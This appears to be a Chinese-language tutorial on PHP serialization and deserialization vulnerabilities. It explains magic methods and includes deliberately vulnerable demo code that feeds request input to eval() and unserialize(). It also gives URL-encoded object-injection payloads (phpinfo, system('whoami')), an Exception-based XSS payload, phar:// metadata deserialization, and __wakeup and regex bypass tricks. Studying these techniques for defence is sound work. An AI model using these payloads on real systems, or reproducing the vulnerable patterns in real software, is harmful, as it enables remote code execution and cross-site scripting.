PHP序列化和反序列化

PHP序列化和反序列化,第1张

概述目录简介PHP基本类型的序列化PHP中的魔术方法利用序列化获取敏感信息常见反序列原生类利用SoapClient::__call方法(PHP5/7)__toString(PHP5/7)__constructPhar反序列化小技巧__wakeup失效bypass反序列化正则反序列化字符逃逸session反序列化PHP引用Exception绕过简介

目录简介PHP基本类型的序列化PHP中的魔术方法利用序列化获取敏感信息常见反序列原生类利用SoapClient::__call方法(PHP5/7)__toString(PHP5/7)__constructPhar反序列化小技巧__wakeup失效bypass反序列化正则反序列化字符逃逸session反序列化PHP引用Exception 绕过

简介

  在各类语言中,将对象的状态信息转换为可存储或可传输的过程就是序列化,序列化的逆过程就是便是序列化,主要是为了方便对象传输。
这里介绍PHP序列化和反序列化。

PHP基本类型的序列化

bool:b:value =>b:0
int:i:value=>i:1
str:s:length:“value”;=>s:4"aaaa"
array:a:<length>:{key:value pairs};=>a:{i:1;s:1:“a”}
object:O:<class_name_length>:
NulL:N

字母代表类型,数字代表类型字节数,value则是对应类型的值。
举例:

<?PHPclass test{	public $a=false;	public $b=3;	public $c='hello';	public $d=array(1,2,3,'hello');	public $e=NulL;}$test = new test;echo serialize($test);?>

输出:

O:4:“test”:5:{s:1:“a”;b:0;s:1:“b”;i:3;s:1:“c”;s:5:“hello”;s:1:“d”;a:4:{i:0;i:1;i:1;i:2;i:2;i:3;i:3;s:5:“hello”;}s:1:“e”;N;}

PHP中的魔术方法

PHP中把以两个下划线__开头的方法称为魔术方法(Magic methods),是系统预定义的方法。
魔术方法的作用、方法名、使用参数列表和返回值都是规定好的,需要用户自己编写方法体内容。不需要调用
魔术方法:

__construct(),类的构造函数,当对象被创建时调用
__destruct(),类的析构函数,当对象被销毁时调用
__call(),在对象中调用一个不可访问方法时调用
__callStatic(),用静态方式中调用一个不可访问方法时调用
__get(),从不可访问的属性读取数据时调用
__set(),设置一个类的成员变量时调用
__isset(),当对不可访问属性调用isset()或empty()时调用
__unset(),当对不可访问属性调用unset()时被调用。
__sleep(),执行serialize()前时,先会调用这个函数
__wakeup(),执行unserialize()前时,先会调用这个函数
__toString(),类被当成字符串时使用时被调用(echo file_exists)
__invoke(),调用函数的方式调用一个对象时的回应方法
__set_state(),调用var_export()导出类时,此静态方法会被调用。
__clone(),当对象复制完成时调用
__autoload(),尝试加载未定义的类
__deBUGInfo(),打印所需调试信息

利用序列化获取敏感信息常见反序列

1、

<?PHP	class test{		function __destruct(){			echo $_GET['cmd'];			eval($_GET['cmd']);			#system($_GET['cmd']);		}	}	#eval('system("");');	unserialize($_GET['u']);?>

构造payload:

u=O:4:“test”:0:{}&cmd=system(“whoami”);

可以爆出一些信息
system(“whoami”);laptop-uopqa8nr\Íõçù

2、通过其他类的方法利用

<?PHP	class test{		protected $ClassObj;		function __construct(){			$this->ClassObj=new normal;		}		function __destruct(){			$this->ClassObj->action();		}	}	class normal{		function action(){			echo "hello";		}	}	class evil{		private $data;		function action(){			eval($this->data);		}	}	echo $_GET['cmd'];	$c=unserialize($_GET['cmd']);?>

通过代码分析可以将normal换成evil类,析构时会调用evil的action方法。
因为ClassObj类是保护型,存在“%00*%00”来表示它,在构造payload时要通过urlencode编码避免%00缺失。

<?PHP	class test{		protected $ClassObj;		function __construct(){			$this->ClassObj=new normal;		}		function __destruct(){			$this->ClassObj->action();		}	}	class normal{		function action(){			echo "hello";		}	}	class evil{		private $data;		function action(){			eval($this->data);		}	}	echo $_GET['cmd'];	$c=unserialize($_GET['cmd']);	#echo $c;	#$test=new test1;	#echo serialize($test);?>

payload:

O%3A4%3A"test"%3A1%3A%7Bs%3A11%3A"%00%2A%00ClassObj"%3BO%3A4%3A"evil"%3A1%3A%7Bs%3A10%3A"%00evil%00data"%3Bs%3A10%3A"PHPinfo%28%29%3B"%3B%7D%7D

原生类利用SoapClIEnt::__call方法(PHP5/7)

详细见点这

__toString(PHP5/7)
<?PHP	echo unserialize($_REQUEST['u']);?>

构造Exploit

<?PHP	echo urlencode(serialize(new Exception("<script>alter(/xss/)</script>")));?>

O%3A9%3A%22Exception%22%3A6%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A29%3A%22%3Cscript%3Ealter%28%2Fxss%2F%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A39%3A%22C%3A%5CPHPstudy_pro%5CWWW%5CPHP%5Cserial%5Ctest.PHP%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A3%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7D%7D

主要利用了Exception类对错误消息没有过滤,导致最终反序列化后输出内容在网页中造成XSS。

__construct

配合原生类SimpleXMLElement类
待补充。。。

Phar反序列化

详细见
我们一般利用反序列漏洞,一般都是借助unserialize()函数,不过随着人们安全的意识的提高这种漏洞利用越来越来难了。Phar反序列化这种方法可以在不使用unserialize()函数的情况下触发PHP反序列化漏洞。漏洞触发是利用Phar:// 伪协议读取phar文件时,会反序列化Meta-data储存的信息。

一、PHAR简介

PHAR (“PHP ARchive”) 是PHP里类似于JAR的一种打包文件,在PHP 5.3 或更高版本中默认开启,这个特性使得
PHP也可以像 Java 一样方便地实现应用程序打包和组件化。一个应用程序可以打成一个 Phar 包,直接放到 PHP-FPM 中运行。

二. PHAR文件结构
Phar文件主要包含三至四个部分:

a stub stub的基本结构:xxx<?PHP xxx;__HALT_COMPILER();?>,前面内容不限,但必须以__HALT_COMPILER();?>来结尾,否则phar扩展将无法识别这个文件为phar文件。

a manifest describing the contents

Phar文件中被压缩的文件的一些信息,其中Meta-data部分的信息会以序列化的形式储存,这里就是漏洞利用的关键点 生成phar文件

the file contents 被压缩的文件内容,在没有特殊要求的情况下,这个被压缩的文件内容可以随便写的,因为我们利用这个漏洞主要是为了触发它的反序列化

a signature for verifying Phar integrity 签名格式

构造一个phar文件
根据文件结构我们来自己构建一个phar文件,PHP内置了一个Phar类来处理相关 *** 作
注意:要将PHP.ini中的phar.Readonly选项设置为Off,否则无法生成phar文件。

[Phar]; http://PHP.net/phar.Readonlyphar.Readonly = Off; http://PHP.net/phar.require-hash;phar.require_hash = On;phar.cache_List =
<?PHP    class TestObject {    }    $phar = new Phar("phar.phar"); //后缀名必须为phar    $phar->startBuffering();    $phar->setStub("<?PHP __HALT_COMPILER(); ?>"); //设置stub    $o = new TestObject();    $o -> data='HackHack';    $phar->setMetadata($o); //将自定义的Meta-data存入manifest    $phar->addFromString("test.txt", "test"); //添加要压缩的文件    //签名自动计算    $phar->stopBuffering();?>


可以明显的看到Meta-data是以序列化的形式存储的。
有序列化数据必然会有反序列化 *** 作,PHP一大部分的文件系统函数在通过phar://伪协议解析phar文件时,都会将Meta-data进行反序列化,测试后受影响的函数如下:

<?PHPclass TestObject{    function __destruct()    {        echo $this -> data;   // Todo: Implement __destruct() method.    }}include('phar://phar.phar');?>

可以看到成功触发了反序列化

小技巧__wakeup失效

影响版本PHP5-5.6.25 PHP7-7.0.10
原因:当属性个数不正确时,process_nested_data函数会返回为0,导致call_user_function_ex函数不会执行,则PHP中就不会调用__wakeup().
方法:构造属性不一致的序列化对象字符串可对__wakeup()绕过。

bypass反序列化正则

当执行反序列化时,使用正则@H_951_301@/[oc]:\d+:/i进行拦截,主要拦截了@H_951_301@O:4:"demo":1:{s:5:"demoa";a:0:{}}
绕过@H_951_301@O:+4:"demo":1:{s:5:"demoa";a:0:{}}+号跳转,表达数字

反序列化字符逃逸

构造payload的长度的无效字符串,进而实现payload修改属性值。

session反序列化

Session处理器:PHP、PHP_binary、PHP_serialize、wddx
待补充

PHP引用Exception 绕过

解析一部分,构造正确类名,进而调用析构函数,绕过抛出异常。

总结

以上是内存溢出为你收集整理的PHP序列化和反序列化全部内容,希望文章能够帮你解决PHP序列化和反序列化所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/1000877.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-21
下一篇 2022-05-21

发表评论

登录后才能评论

评论列表(0条)

保存